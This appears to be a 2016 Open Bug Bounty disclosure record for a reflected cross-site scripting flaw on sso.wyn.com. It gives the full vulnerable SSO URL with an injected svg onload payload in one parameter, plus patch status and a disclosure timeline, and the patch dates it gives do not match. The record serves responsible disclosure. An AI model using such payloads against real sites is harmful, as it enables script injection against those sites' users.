sso.wyn.com XSS vulnerability

2016-03-12T18:52:00
ID OBB:141187
Type openbugbounty
Reporter Spam404
Modified 2016-06-05T11:26:00

Description

Vulnerable URL:
https://sso.wyn.com/oamfed/idp/samlv20?SAMLRequest=fZFBb4JAEIX%2FCtm77IIWcSMkVg81sS0ptIdemmUZ6yawS3cWrf%2B%2BKG2ih3qeN99782aOoqlbvujcTr%2FAVwfovO%2Bm1sjPg4R0VnMjUCHXogHkTvJ88bjhoc94a40z0tTEWyCCdcropdHYNWBzsHsl4fVlk5Cdcy1yShGNL7dCOmN9DY7mO1WWpga38%2FsRPWFDmj3nBfFWfQ6lxYl4vX84al%2BahhrRbKGiqmrpKeg%2BZMRbrxLyEcgomlWSgWQimsaTKoYwHk8ZzGA6mZRlL0PsYK3RCe0SErIgGrHxKAiLIOZ3jLPZO%2FGy38vula6U%2FrxdQzmIkD8URTYaDngDi%2BfwvYCk81NGfja2F%2FXexoq%2FTkn6X4NzegEeXFr%2B1JPWq8zUSh69RV2bw9KCcJCQgNB0WLn%2BePoD&RelayState;=ss%3Amem%3A3dc28ea260a541bb4203f5759176a5a87360d208de936303fa5af948c20f2068&c7u;&OAM;_REQ=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E
Details:

Description| Value
---|---
Patched:| Yes, at 09.04.2016
Latest check for patch:| 09.04.2016 14:34 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check sso.wyn.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 March, 2016 18:52 GMT
Generic security notifications sent to website owner| 12 March, 2016 18:55 GMT
Notification sent to subscribers (without technical details)| 12 March, 2016 22:17 GMT
Vulnerability details disclosed by researcher| 4 June, 2016 19:11 GMT
Vulnerability patched by the website owner| 5 June, 2016 11:26 GMT